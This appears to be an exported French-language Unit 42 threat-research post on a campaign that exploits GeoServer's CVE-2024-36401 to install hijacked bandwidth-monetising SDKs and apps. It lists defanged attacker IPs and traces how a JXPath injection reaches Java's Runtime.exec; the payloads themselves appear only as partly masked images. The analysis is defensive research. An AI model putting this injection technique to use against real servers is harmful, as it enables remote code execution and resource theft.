{"id":156324,"date":"2025-08-21T07:53:32","date_gmt":"2025-08-21T14:53:32","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=156324"},"modified":"2025-09-10T08:37:33","modified_gmt":"2025-09-10T15:37:33","slug":"attackers-sell-your-bandwidth-using-sdks","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/","title":{"rendered":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante"},"content":{"rendered":"<h2><a id=\"post-156324-_heading=h.yom2667ow25x\"><\/a>Avant-propos<\/h2>\n<p>Nous avons d\u00e9tect\u00e9 une campagne visant \u00e0 prendre le contr\u00f4le des machines de victimes et \u00e0 mon\u00e9tiser l\u2019acc\u00e8s \u00e0 leur bande passante. Elle repose sur l\u2019exploitation de la vuln\u00e9rabilit\u00e9 <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-36401\" target=\"_blank\" rel=\"noopener\">CVE-2024-36401<\/a> impactant GeoServer, une base de donn\u00e9es g\u00e9ospatiale. Le <a href=\"https:\/\/nvd.nist.gov\/vuln-metrics\/cvss\" target=\"_blank\" rel=\"noopener\">score\u00a0<\/a>CVSS de cette faille d\u2019ex\u00e9cution de code \u00e0 distance, class\u00e9e critique, s\u2019\u00e9l\u00e8ve \u00e0 9,8.<\/p>\n<p>Les cybercriminels s\u2019en servent pour d\u00e9ployer des kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes ou des applications modifi\u00e9es, leur permettant de g\u00e9n\u00e9rer des revenus passifs via le partage de r\u00e9seau ou l\u2019usage de proxies r\u00e9sidentiels.<\/p>\n<p>Cette m\u00e9thode de g\u00e9n\u00e9ration de revenus passifs est particuli\u00e8rement furtive. Elle reproduit une strat\u00e9gie de mon\u00e9tisation adopt\u00e9e par certains d\u00e9veloppeurs d\u2019applications qui pr\u00e9f\u00e8rent les SDK aux publicit\u00e9s traditionnelles. Une pratique parfois bien intentionn\u00e9e, destin\u00e9e \u00e0 pr\u00e9server l\u2019exp\u00e9rience utilisateur et \u00e0 am\u00e9liorer la fid\u00e9lisation.<\/p>\n<p>Les applications que nous avons identifi\u00e9es dans le cadre de cette activit\u00e9 malveillante fonctionnent presque en silence. Elles consomment tr\u00e8s peu de ressources tout en mon\u00e9tisant la bande passante internet des victimes, sans cr\u00e9ation ni distribution de malwares. Cette int\u00e9gration permet aux d\u00e9veloppeurs d\u2019applications de percevoir des paiements, tandis que les criminels profitent des ressources serveur inutilis\u00e9es \u2013\u00a0ce qui leur permet d\u2019\u00e9chapper \u00e0 la d\u00e9tection.<\/p>\n<p>Depuis mars 2025, les attaquants sondent les instances\u00a0GeoServer expos\u00e9es sur internet. <a href=\"https:\/\/www.paloaltonetworks.com\/cortex\/cortex-xpanse\" target=\"_blank\" rel=\"noopener\">Cortex\u00a0Xpanse<\/a> a recens\u00e9 3\u00a0706 instances de\u00a0GeoServer accessibles publiquement lors de la premi\u00e8re semaine de mai\u00a02025, r\u00e9v\u00e9lant une surface d\u2019attaque potentiellement importante pour les adversaires exploitant la vuln\u00e9rabilit\u00e9\u00a0CVE-2024-36401.<\/p>\n<p>Les clients de Palo\u00a0Alto\u00a0Networks sont mieux prot\u00e9g\u00e9s contre les menaces mentionn\u00e9es dans cet article gr\u00e2ce aux produits et services suivants\u00a0:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-threat-prevention\" target=\"_blank\" rel=\"noopener\">Advanced\u00a0Threat Prevention<\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-wildfire\" target=\"_blank\" rel=\"noopener\">Advanced\u00a0WildFire<\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a> et <a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-dns-security\" target=\"_blank\" rel=\"noopener\">Advanced DNS Security<\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/cortex\/cortex-xdr?_gl=1*13pmp8e*_ga*NzQyNjM2NzkuMTY2NjY3OTczNw..*_ga_KS2MELEEFC*MTY2OTczNjA2MS4zMS4wLjE2Njk3MzYwNjEuNjAuMC4w\" target=\"_blank\" rel=\"noopener\">Cortex XDR<\/a> e\u00a0<a href=\"https:\/\/paloaltonetworks.com\/cortex\/cortex-xsiam\" target=\"_blank\" rel=\"noopener\">XSIAM<\/a><\/li>\n<\/ul>\n<p>Si vous pensez que votre entreprise a pu \u00eatre compromise ou si vous faites face \u00e0 une urgence, contactez <a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">l\u2019\u00e9quipe Unit\u00a042 de <\/a> r\u00e9ponse aux incidents.<\/p>\n<table style=\"width: 98.107%;\">\n<thead>\n<tr>\n<td style=\"width: 35%;\"><b>Unit\u00a042 \u2013\u00a0Th\u00e9matiques connexes<\/b><\/td>\n<td style=\"width: 205.282%;\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/category\/vulnerabilities-fr\/\" target=\"_blank\" rel=\"noopener\"><b>Vulnerabilities<\/b><\/a><\/td>\n<\/tr>\n<\/thead>\n<\/table>\n<h2><a id=\"post-156324-_heading=h.wio1hd66g08g\"><\/a>Dissection de la campagne<\/h2>\n<p>Nous avons suivi de pr\u00e8s une campagne apparue d\u00e9but mars 2025. Les attaquants ont modifi\u00e9 aussi bien leur infrastructure que leurs tactiques, techniques et proc\u00e9dures (TTP) pour \u00e9tablir une pr\u00e9sence.<\/p>\n<p>Nos analyses ont r\u00e9v\u00e9l\u00e9 que les attaquants ont d\u00e9tourn\u00e9 \u00e0 la fois un SDK et une application\u00a0:<\/p>\n<ul>\n<li>Le SDK permettait aux d\u00e9veloppeurs de mon\u00e9tiser d\u2019autres applications en collectant des donn\u00e9es utilisateur afin de g\u00e9n\u00e9rer des revenus passifs.<\/li>\n<li>L\u2019application offrait aux utilisateurs la possibilit\u00e9 de gagner un revenu passif en partageant leur connexion internet.<\/li>\n<\/ul>\n<p>La chronologie suivante illustre l\u2019\u00e9volution de cette menace.<\/p>\n<h3><a id=\"post-156324-_heading=h.emjqw1lrdf4h\"><\/a><strong>Phase\u00a01\u00a0: Intrusion initiale (d\u00e9but mars\u00a02025)<\/strong><\/h3>\n<p>La campagne a d\u00e9but\u00e9 par des tentatives d\u2019exploitation ciblant la vuln\u00e9rabilit\u00e9\u00a0CVE-2024-36401, suivies du d\u00e9ploiement de l\u2019application d\u00e9tourn\u00e9e et des payloads associ\u00e9s au SDK d\u00e9tourn\u00e9.<\/p>\n<ul>\n<li>8\u00a0mars 2025\u00a0: la campagne a commenc\u00e9 par des tentatives d\u2019exploitation provenant de l\u2019adresse\u00a0IP source <span style=\"font-family: 'courier new', courier, monospace;\">108.251.152[.]209<\/span>. L\u2019attaquant a utilis\u00e9 un exploit visant sp\u00e9cifiquement la vuln\u00e9rabilit\u00e9\u00a0CVE-2024-36401.<\/li>\n<li>Distribution d\u2019ex\u00e9cutables personnalis\u00e9s\u00a0: nous avons observ\u00e9 que ces premi\u00e8res exploitations r\u00e9cup\u00e9raient des ex\u00e9cutables personnalis\u00e9s h\u00e9berg\u00e9s \u00e0 l\u2019adresse <span style=\"font-family: 'courier new', courier, monospace;\">37.187.74[.]75<\/span>.<\/li>\n<li>Deux ex\u00e9cutables principaux ont \u00e9t\u00e9 distribu\u00e9s depuis cet h\u00f4te\u00a0:\n<ul>\n<li>L\u2019application d\u00e9tourn\u00e9e\u00a0: nous avons d\u00e9tect\u00e9 plusieurs variantes, dont trois que nous avons d\u00e9sign\u00e9es sous les identifiants <span style=\"font-family: 'courier new', courier, monospace;\">a193, d193<\/span> et <span style=\"font-family: 'courier new', courier, monospace;\">e193<\/span>.<\/li>\n<li>Le SDK d\u00e9tourn\u00e9\u00a0: nous avons identifi\u00e9 plusieurs variantes, dont cinq que nous avons d\u00e9sign\u00e9es sous les identifiants <span style=\"font-family: 'courier new', courier, monospace;\">a593, c593, d593, s593<\/span> et <span style=\"font-family: 'courier new', courier, monospace;\">z593<\/span>.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3><a id=\"post-156324-_heading=h.wzsm9tbli2s3\"><\/a><strong>Phase\u00a02\u00a0: \u00c9volution des tactiques (fin mars \u2013\u00a0d\u00e9but avril\u00a02025)<\/strong><\/h3>\n<p>Au cours de cette phase, les attaquants ont chang\u00e9 de tactique.<\/p>\n<ul>\n<li>24\u00a0mars 2025\u00a0: quelques \u00e9diteurs pr\u00e9sents sur VirusTotal ont signal\u00e9 l\u2019adresse\u00a0IP de distribution <span style=\"font-family: 'courier new', courier, monospace;\">37.187.74[.]75<\/span> comme \u00e9tant malveillante. Ce basculement indique que la communaut\u00e9 de la s\u00e9curit\u00e9 a commenc\u00e9 \u00e0 identifier des activit\u00e9s malveillantes \u00e9manant de cette adresse. Nous pensons que ce facteur a jou\u00e9 un r\u00f4le d\u00e9terminant dans la d\u00e9cision des attaquants de d\u00e9placer leur infrastructure vers une nouvelle adresse\u00a0IP.<\/li>\n<li>26\u00a0mars 2025\u00a0: les attaquants semblent avoir cess\u00e9 de distribuer de nouveaux \u00e9chantillons de l\u2019application d\u00e9tourn\u00e9e. L\u2019attention s\u2019est apparemment port\u00e9e exclusivement sur le SDK d\u00e9tourn\u00e9.<\/li>\n<li>1er\u00a0avril 2025\u00a0: les acteurs de la menace ont bascul\u00e9 leur infrastructure principale de diffusion d\u2019exploits vers une nouvelle adresse\u00a0IP source, <span style=\"font-family: 'courier new', courier, monospace;\">185.246.84[.]189<\/span>. Cette man\u0153uvre visait probablement \u00e0 contourner les listes de blocage et \u00e0 poursuivre leurs op\u00e9rations sans entrave.<\/li>\n<\/ul>\n<h3><a id=\"post-156324-_heading=h.aaz3kv8409w4\"><\/a><strong>Phase\u00a03\u00a0: Expansion de l\u2019infrastructure et persistance (mi-avril\u00a02025 \u2013 en cours)<\/strong><\/h3>\n<p>Les attaquants ont \u00e9tendu leur infrastructure pendant cette phase de la campagne.<\/p>\n<ul>\n<li>17\u00a0avril 2025\u00a0: ils ont \u00e9largi leur infrastructure backend en mettant en ligne une nouvelle adresse\u00a0IP de distribution d\u2019ex\u00e9cutables personnalis\u00e9s, <span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52<\/span>.<\/li>\n<li>L\u2019adresse IP de distribution initiale, <span style=\"font-family: 'courier new', courier, monospace;\">37.187.74[.]75<\/span>, \u00e9tait toujours active \u00e0 la mi-juin.<\/li>\n<\/ul>\n<p>\u00c0 la date de r\u00e9daction de ce rapport, les tentatives d\u2019exploitation se poursuivent depuis l\u2019adresse\u00a0<span style=\"font-family: 'courier new', courier, monospace;\">185.246.84[.]189<\/span>, et les serveurs de distribution d\u2019ex\u00e9cutables personnalis\u00e9s restent op\u00e9rationnels.<\/p>\n<h2><a id=\"post-156324-_heading=h.4a4qj1lx2ve\"><\/a>Analyse de l\u2019exploitation de la vuln\u00e9rabilit\u00e9\u00a0CVE-2024-36401<\/h2>\n<p>Le c\u0153ur de cette vuln\u00e9rabilit\u00e9 r\u00e9side dans la capacit\u00e9 d\u2019un attaquant \u00e0 injecter du code arbitraire dans des instructions de requ\u00eate\u00a0JXPath. JXPath est une biblioth\u00e8que du projet Apache\u00a0Commons qui propose une mise en \u0153uvre de XPath.<\/p>\n<p>XPath est une norme largement adopt\u00e9e pour l\u2019interrogation et la transformation de documents\u00a0XML. JXPath \u00e9tend de mani\u00e8re transparente l\u2019utilisation des expressions\u00a0XPath \u00e0 diverses structures de donn\u00e9es\u00a0Java au-del\u00e0 du XML, notamment les JavaBeans et plusieurs types de collections. D\u2019un point de vue s\u00e9curit\u00e9, cette flexibilit\u00e9 suppl\u00e9mentaire soul\u00e8ve \u00e9galement des pr\u00e9occupations importantes.<\/p>\n<p>JXPath prend en charge <a href=\"https:\/\/commons.apache.org\/proper\/commons-jxpath\/apidocs\/index.html#extension-functions-heading\" target=\"_blank\" rel=\"noopener\">des fonctions d\u2019extension<\/a>, qu\u2019un attaquant peut exploiter s\u2019il parvient \u00e0 contr\u00f4ler l\u2019instruction de requ\u00eate, ce qui lui permet d\u2019ex\u00e9cuter du code arbitraire. Cette situation repr\u00e9sente un risque plus \u00e9lev\u00e9 que les vuln\u00e9rabilit\u00e9s classiques d\u2019injection de requ\u00eate.<\/p>\n<p>Les attaquants ont par exemple utilis\u00e9 les fonctions d\u2019extension standard pour invoquer des m\u00e9thodes telles que <span style=\"font-family: 'courier new', courier, monospace;\"><em>getRuntime().exec()<\/em><\/span>.<\/p>\n<p>La Figure\u00a01 montre un exemple de code malveillant exploitant la capacit\u00e9 de JXPath \u00e0 \u00e9valuer des expressions, ce qui permet \u00e0 un attaquant d\u2019injecter et d\u2019ex\u00e9cuter des commandes syst\u00e8me arbitraires via le placeholder\u00a0<span style=\"font-family: 'courier new', courier, monospace;\">#{cmd}<\/span>. En appelant <span style=\"font-family: 'courier new', courier, monospace;\">exec(java.lang.Runtime.getRuntime())<\/span> au sein de <span style=\"font-family: 'courier new', courier, monospace;\">context.getValue<\/span>, l\u2019attaquant d\u00e9clenche le m\u00e9canisme d\u2019ex\u00e9cution du runtime\u00a0Java, ce qui conduit \u00e0 une ex\u00e9cution de code \u00e0 distance sur le syst\u00e8me cible.<\/p>\n<figure id=\"attachment_156325\" aria-describedby=\"caption-attachment-156325\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156325 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-33505-156324-1.png\" alt=\"Une ligne de code affich\u00e9e sur fond sombre montre une vuln\u00e9rabilit\u00e9 d\u2019injection de commande utilisant Java Runtime pour ex\u00e9cuter une commande non ind\u00e9sirable.\" width=\"1000\" height=\"134\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-33505-156324-1.png 1164w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-33505-156324-1-786x105.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-33505-156324-1-768x103.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156325\" class=\"wp-caption-text\">Figure 1. Code malveillant contenant une r\u00e9f\u00e9rence JXPath vers une fonction d\u2019ex\u00e9cution Java.<\/figcaption><\/figure>\n<p>La Figure\u00a02 met en \u00e9vidence le payload issu de cette attaque. Nous avons reproduit la partie cl\u00e9 de ce payload dans la Figure\u00a02. La portion masqu\u00e9e contraint la victime \u00e0 ex\u00e9cuter une commande syst\u00e8me destin\u00e9e \u00e0 t\u00e9l\u00e9charger un fichier depuis les adresses\u00a0IP de distribution contr\u00f4l\u00e9es par l\u2019attaquant.<\/p>\n<figure id=\"attachment_156336\" aria-describedby=\"caption-attachment-156336\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156336 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-36148-156324-2.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un extrait de code, incluant des balises telles que GetPropertyValue et ValueReference. L\u2019arri\u00e8re-plan est noir avec du texte vert. Certaines informations ont \u00e9t\u00e9 masqu\u00e9es.\" width=\"1000\" height=\"245\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-36148-156324-2.png 1812w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-36148-156324-2-786x193.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-36148-156324-2-768x188.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-36148-156324-2-1536x376.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156336\" class=\"wp-caption-text\">Figure 2. Payload d\u2019un exploit observ\u00e9 en conditions r\u00e9elles.<\/figcaption><\/figure>\n<p>Selon la <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-36401\" target=\"_blank\" rel=\"noopener\">NVD<\/a>\u00a0:<\/p>\n<p style=\"padding-left: 40px;\"><em>Cette vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 confirm\u00e9e comme exploitable via diff\u00e9rents types de requ\u00eates Web Feature Service (WFS), Web Map Service (WMS) et Web Processing Service (WPS), notamment GetFeature, GetPropertyValue, GetMap, GetFeatureInfo, GetLegendGraphic et Execute.<\/em><\/p>\n<p>Lors de l\u2019analyse d\u2019un exploit utilis\u00e9 dans cette attaque, nous avons configur\u00e9 une instance de GeoServer et appliqu\u00e9 un payload observ\u00e9 en conditions r\u00e9elles afin d\u2019\u00e9tudier son fonctionnement. Le suivi du flux de code de GeoServer nous a permis d\u2019observer ce qui se passe en interne.<\/p>\n<p>Apr\u00e8s avoir simul\u00e9 l\u2019envoi d\u2019un payload d\u2019attaque, notre commande a \u00e9t\u00e9 transmise \u00e0 la fonction <span style=\"font-family: 'courier new', courier, monospace;\"><em>GetPropertyValue<\/em><\/span>. Comme l\u2019illustre la Figure\u00a03, la ligne surlign\u00e9e prend l\u2019objet\u00a0<span style=\"font-family: 'courier new', courier, monospace;\"><em>request<\/em><\/span> entrant et le transmet \u00e0 une m\u00e9thode\u00a0<span style=\"font-family: 'courier new', courier, monospace;\"><em>run<\/em><\/span>. La commande est alors port\u00e9e par <span style=\"font-family: 'courier new', courier, monospace;\"><em>request.valueReference<\/em><\/span>.<\/p>\n<figure id=\"attachment_156347\" aria-describedby=\"caption-attachment-156347\" style=\"width: 917px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156347 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-38900-156324-3.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un code dans un IDE, comprenant la d\u00e9finition d\u2019une m\u00e9thode dans une classe marqu\u00e9e comme rempla\u00e7ant une m\u00e9thode d\u2019un service impl\u00e9ment\u00e9. Le code est mis en \u00e9vidence par une coloration syntaxique en rouge et bleu.\" width=\"917\" height=\"287\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-38900-156324-3.png 917w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-38900-156324-3-786x246.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-38900-156324-3-768x240.png 768w\" sizes=\"(max-width: 917px) 100vw, 917px\" \/><figcaption id=\"caption-attachment-156347\" class=\"wp-caption-text\">Figure 3. Point d\u2019entr\u00e9e d\u2019un payload malveillant.<\/figcaption><\/figure>\n<p>En entrant dans cette fonction, on constate que le payload de la Figure\u00a02 a \u00e9t\u00e9 transmis \u00e0 l\u2019objet <span style=\"font-family: 'courier new', courier, monospace;\"><em>propertyNameNoIndexes<\/em><\/span>, comme le montre le code d\u2019exploit de la Figure\u00a04. Cet objet appelle ensuite la m\u00e9thode <span style=\"font-family: 'courier new', courier, monospace;\"><em>evaluate <\/em><\/span>de <span style=\"font-family: 'courier new', courier, monospace;\">GeoTools.<\/span><\/p>\n<figure id=\"attachment_156358\" aria-describedby=\"caption-attachment-156358\" style=\"width: 985px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156358 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-41547-156324-4.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un code dans un IDE avec coloration syntaxique, affichant des m\u00e9thodes et une gestion des exceptions li\u00e9es aux propri\u00e9t\u00e9s d\u2019attributs. L\u2019image montre plusieurs lignes de code avec commentaires et indicateurs d\u2019erreurs.\" width=\"985\" height=\"264\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-41547-156324-4.png 985w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-41547-156324-4-786x211.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-41547-156324-4-768x206.png 768w\" sizes=\"(max-width: 985px) 100vw, 985px\" \/><figcaption id=\"caption-attachment-156358\" class=\"wp-caption-text\">Figure 4. Le payload malveillant est transmis \u00e0 une m\u00e9thode <span style=\"font-family: 'courier new', courier, monospace;\">GeoTools<\/span> non s\u00e9curis\u00e9e.<\/figcaption><\/figure>\n<p>Nous sommes ici dans le code source de <a href=\"https:\/\/geotools.org\/\" target=\"_blank\" rel=\"noopener\">GeoTools<\/a>. La m\u00e9thode <em><span style=\"font-family: 'courier new', courier, monospace;\">evaluate<\/span> <\/em>r\u00e9cup\u00e8re la valeur de l\u2019attribut <span style=\"font-family: 'courier new', courier, monospace;\">GeoTools<\/span> \u00e0 partir de l\u2019objet fourni. Dans cette m\u00e9thode, un objet <span style=\"font-family: 'courier new', courier, monospace;\"><em>PropertyAccessor <\/em><\/span>est utilis\u00e9 pour lire la propri\u00e9t\u00e9. La Figure\u00a05 montre que <span style=\"font-family: 'courier new', courier, monospace;\"><em>PropertyAccessor <\/em><\/span>est une interface centrale qui d\u00e9finit les op\u00e9rations de lecture et d\u2019\u00e9criture des valeurs de propri\u00e9t\u00e9 d\u2019un objet. GeoTools tente de trouver un <em><span style=\"font-family: 'courier new', courier, monospace;\">accessor<\/span> <\/em>en fonction des param\u00e8tres fournis.<\/p>\n<figure id=\"attachment_156369\" aria-describedby=\"caption-attachment-156369\" style=\"width: 834px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156369 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-44160-156324-5.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un code dans un IDE, comprenant plusieurs m\u00e9thodes et instructions conditionnelles \u00ab\u00a0if-else\u00a0\u00bb, affich\u00e9es avec des num\u00e9ros de ligne et une coloration syntaxique. La ligne PropertyAccessors est mise en surbrillance.\" width=\"834\" height=\"353\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-44160-156324-5.png 834w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-44160-156324-5-786x333.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-44160-156324-5-768x325.png 768w\" sizes=\"(max-width: 834px) 100vw, 834px\" \/><figcaption id=\"caption-attachment-156369\" class=\"wp-caption-text\">Figure 5. Le payload malveillant est transmis \u00e0 la m\u00e9thode <span style=\"font-family: 'courier new', courier, monospace;\">findPropertyAccessors<\/span> de l\u2019objet <span style=\"font-family: 'courier new', courier, monospace;\">PropertyAccessor<\/span>.<\/figcaption><\/figure>\n<p>Une fois <span style=\"font-family: 'courier new', courier, monospace;\">l\u2019<em><span style=\"font-family: 'courier new', courier, monospace;\">accessor<\/span> <\/em><\/span>identifi\u00e9, il utilise la m\u00e9thode\u00a0get de l\u2019objet pour r\u00e9cup\u00e9rer la valeur de la propri\u00e9t\u00e9. La Figure\u00a06 montre que notre payload a \u00e9t\u00e9 transmis \u00e0 cette m\u00e9thode via le param\u00e8tre <span style=\"font-family: 'courier new', courier, monospace;\"><em>attPath<\/em><\/span>.<\/p>\n<figure id=\"attachment_156380\" aria-describedby=\"caption-attachment-156380\" style=\"width: 845px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156380 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-46837-156324-6.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un \u00e9cran d\u2019ordinateur affichant du code dans un IDE, incluant des fonctions et des propri\u00e9t\u00e9s \u00e9crites dans un langage de programmation, avec un focus sur une m\u00e9thode nomm\u00e9e \u00ab\u00a0getAttributeExpression\u00a0\u00bb.\" width=\"845\" height=\"481\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-46837-156324-6.png 845w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-46837-156324-6-773x440.png 773w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-46837-156324-6-768x437.png 768w\" sizes=\"(max-width: 845px) 100vw, 845px\" \/><figcaption id=\"caption-attachment-156380\" class=\"wp-caption-text\">Figure 6. Un payload malveillant est transmis \u00e0 <span style=\"font-family: 'courier new', courier, monospace;\">attPath<\/span>.<\/figcaption><\/figure>\n<p>La m\u00e9thode get de l\u2019objet appelle la fonction <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/commons.apache.org\/proper\/commons-jxpath\/apidocs\/org\/apache\/commons\/jxpath\/ri\/JXPathContextReferenceImpl.html#iteratePointers(java.lang.String)\" target=\"_blank\" rel=\"noopener\"><em>iteratePointers<\/em><\/a><\/span> de la biblioth\u00e8que\u00a0JXPath. Comme le montre la Figure\u00a07, un payload est inject\u00e9 dans la variable <span style=\"font-family: 'courier new', courier, monospace;\"><em>xpath<\/em><\/span>, laquelle est ensuite transmise \u00e0 la m\u00e9thode <span style=\"font-family: 'courier new', courier, monospace;\"><em>context.iteratePointers<\/em><\/span>.<\/p>\n<figure id=\"attachment_156391\" aria-describedby=\"caption-attachment-156391\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156391 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-49618-156324-7.png\" alt=\"Capture d\u2019\u00e9cran de code informatique dans un environnement de d\u00e9veloppement int\u00e9gr\u00e9 (IDE), relatif aux requ\u00eates\u00a0HTTP et \u00e0 la gestion des erreurs.\" width=\"1000\" height=\"216\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-49618-156324-7.png 1414w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-49618-156324-7-786x170.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-49618-156324-7-768x166.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156391\" class=\"wp-caption-text\">Figure\u00a07. Fonction <span style=\"font-family: 'courier new', courier, monospace;\">iteratePointers<\/span> de JXPath.<\/figcaption><\/figure>\n<p>La fonction <span style=\"font-family: 'courier new', courier, monospace;\"><em>ExtensionFunction<\/em><\/span> a \u00e9t\u00e9 manipul\u00e9e et utilise <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/commons.apache.org\/proper\/commons-jxpath\/apidocs\/org\/apache\/commons\/jxpath\/ri\/JXPathContextReferenceImpl.html#iteratePointers(java.lang.String)\" target=\"_blank\" rel=\"noopener\"><em>computeValue<\/em><\/a><\/span> pour \u00e9valuer l\u2019expression. Comme l\u2019illustre la Figure\u00a08, la variable\u00a0<em>function<\/em> pointe d\u00e9sormais directement vers <span style=\"font-family: 'courier new', courier, monospace;\"><em>javax.lang.Runtime.exec<\/em><\/span>, la m\u00e9thode standard de Java pour ex\u00e9cuter des commandes du syst\u00e8me d\u2019exploitation. Les param\u00e8tres transmis \u00e0 cette fonction incluent la commande de l\u2019attaquant, et la ligne surlign\u00e9e ex\u00e9cute cette commande.<\/p>\n<figure id=\"attachment_156402\" aria-describedby=\"caption-attachment-156402\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156402 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-52291-156324-8.png\" alt=\"Capture d\u2019\u00e9cran d\u2019une interface de codage dans un IDE montrant du code\u00a0HTML et JavaScript.\" width=\"1000\" height=\"95\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-52291-156324-8.png 1593w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-52291-156324-8-786x75.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-52291-156324-8-768x73.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-52291-156324-8-1536x147.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156402\" class=\"wp-caption-text\">Figure 8. Ex\u00e9cution de code malveillant.<\/figcaption><\/figure>\n<h2><a id=\"post-156324-_heading=h.33lb3prhorwd\"><\/a>Serveurs vuln\u00e9rables expos\u00e9s<\/h2>\n<p>Les donn\u00e9es de t\u00e9l\u00e9m\u00e9trie de Cortex\u00a0Xpanse recueillies en mars et avril\u00a02025 ont r\u00e9v\u00e9l\u00e9 7\u00a0126\u00a0instances GeoServer expos\u00e9es publiquement dans 99\u00a0pays. Les cinq pays o\u00f9 ces instances sont le plus souvent h\u00e9berg\u00e9es sont pr\u00e9sent\u00e9s dans la Figure\u00a09. La majorit\u00e9 des serveurs expos\u00e9s se trouvent en Chine.<\/p>\n<figure id=\"attachment_152674\" aria-describedby=\"caption-attachment-152674\" style=\"width: 1000px\" class=\"wp-caption 